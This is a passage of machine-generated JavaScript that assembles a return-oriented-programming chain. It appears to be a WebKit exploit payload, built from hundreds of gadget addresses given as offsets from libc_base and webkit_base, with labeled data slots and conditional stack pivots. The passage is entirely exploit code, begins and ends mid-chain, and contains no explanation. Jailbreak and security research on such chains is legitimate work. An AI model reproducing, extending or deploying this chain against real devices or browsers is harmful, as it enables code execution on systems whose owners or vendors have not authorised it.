set_gadget(libc_base+759608,); //pop rax
//L8227:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+393936, //L8229
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L8229:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+394064, //L8231
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+394080, //L8232
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+394048, //L8230
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8230:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8231:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8232:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+394240, //L8236
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+394208, //L8234
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+394224, //L8235
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8233:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L8234:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8235:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8236:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+394296, //L8238
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L8238:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+394424, //L8240
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+394440, //L8241
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+394408, //L8239
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8239:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8240:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8241:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+394520, //L8242
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+394536, //L8243
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8242:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8243:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+394624, //L8244
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+394640, //L8246
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8244:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8246:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8247:
db([4294967196, 4294967295]); // -0x64
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L8249:
db([4294967196, 4294967295]); // -0x64
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+394800, //L8252
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+394784, //L8250
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8250:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8252:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+394976, //L8255
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+394992, //L8256
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+394944, //L8253
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+394960, //L8254
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8253:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8254:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8255:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8256:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+395072, //L8257
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+395088, //L8258
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8257:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8258:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+395184, //L8260
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+395168, //L8259
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8259:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8260:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+395264, //L8261
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8261:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8262:
db([100, 0]); // 0x64
set_gadget(libc_base+144605,); //pop rdi
//L8263:
db([100, 0]); // 0x64
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+395408, //L8264
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+395440, //L8266
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+395424, //L8265
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8264:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8265:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8266:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+395608, //L8268
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+395624, //L8269
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+395592, //L8267
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8267:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8268:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8269:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+395736, //L8271
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+395784, //L8274
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+395752, //L8272
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8271:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8272:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8273:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8274:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+395896, //L8275+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+395888, //L8275
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L8275:
db([0, 0]); // 0x0
set_gadgets([
ropchain+395912, //L8275+24
ropchain+395928, //L8270
libc_base+782311, //pop rsp
ropchain+408824, //L8276
//L8270:
libc_base+764760, //pop rsi
ropchain+395968, //L8277
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8277:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8279:
db([4294967196, 4294967295]); // -0x64
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+396088, //L8282
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+396072, //L8280
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8280:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8282:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+396264, //L8285
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+396280, //L8286
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+396232, //L8283
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+396248, //L8284
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8283:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8284:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8285:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8286:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+396360, //L8287
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+396376, //L8288
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8287:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8288:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+396472, //L8290
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+396456, //L8289
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8289:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8290:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+396552, //L8291
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8291:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8292:
db([105, 0]); // 0x69
set_gadget(libc_base+144605,); //pop rdi
//L8293:
db([105, 0]); // 0x69
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+396696, //L8294
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+396728, //L8296
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+396712, //L8295
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8294:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8295:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8296:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+396896, //L8298
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+396912, //L8299
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+396880, //L8297
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8297:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8298:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8299:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+397024, //L8301
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+397072, //L8304
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+397040, //L8302
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8301:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8302:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8303:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8304:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+397184, //L8305+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+397176, //L8305
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L8305:
db([0, 0]); // 0x0
set_gadgets([
ropchain+397200, //L8305+24
ropchain+397216, //L8300
libc_base+782311, //pop rsp
ropchain+408824, //L8306
//L8300:
libc_base+764760, //pop rsi
ropchain+397256, //L8307
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8307:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8309:
db([4294967196, 4294967295]); // -0x64
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+397376, //L8312
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+397360, //L8310
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8310:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8312:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+397552, //L8315
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+397568, //L8316
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+397520, //L8313
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+397536, //L8314
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8313:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8314:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8315:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8316:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+397648, //L8317
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+397664, //L8318
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8317:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8318:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+397760, //L8320
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+397744, //L8319
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8319:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8320:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+397840, //L8321
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8321:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8322:
db([117, 0]); // 0x75
set_gadget(libc_base+144605,); //pop rdi
//L8323:
db([117, 0]); // 0x75
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+397984, //L8324
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+398016, //L8326
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+398000, //L8325
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8324:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8325:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8326:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+398184, //L8328
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+398200, //L8329
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+398168, //L8327
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8327:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8328:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8329:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+398312, //L8331
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+398360, //L8334
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+398328, //L8332
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8331:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8332:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8333:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8334:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+398472, //L8335+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+398464, //L8335
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L8335:
db([0, 0]); // 0x0
set_gadgets([
ropchain+398488, //L8335+24
ropchain+398504, //L8330
libc_base+782311, //pop rsp
ropchain+408824, //L8336
//L8330:
libc_base+764760, //pop rsi
ropchain+398544, //L8337
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8337:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8339:
db([4294967196, 4294967295]); // -0x64
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+398664, //L8342
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+398648, //L8340
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8340:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8342:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+398840, //L8345
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+398856, //L8346
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+398808, //L8343
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+398824, //L8344
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8343:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8344:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8345:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8346:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+398936, //L8347
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+398952, //L8348
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8347:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8348:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+399048, //L8350
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+399032, //L8349
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8349:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8350:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+399128, //L8351
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8351:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8352:
db([120, 0]); // 0x78
set_gadget(libc_base+144605,); //pop rdi
//L8353:
db([120, 0]); // 0x78
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+399272, //L8354
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+399304, //L8356
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+399288, //L8355
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8354:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8355:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8356:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+399472, //L8358
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+399488, //L8359
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+399456, //L8357
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8357:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8358:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8359:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+399600, //L8361
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+399648, //L8364
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+399616, //L8362
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8361:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8362:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8363:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8364:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+399760, //L8365+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+399752, //L8365
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L8365:
db([0, 0]); // 0x0
set_gadgets([
ropchain+399776, //L8365+24
ropchain+399792, //L8360
libc_base+782311, //pop rsp
ropchain+408824, //L8366
//L8360:
libc_base+764760, //pop rsi
ropchain+399832, //L8367
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8367:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8369:
db([4294967196, 4294967295]); // -0x64
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+399952, //L8372
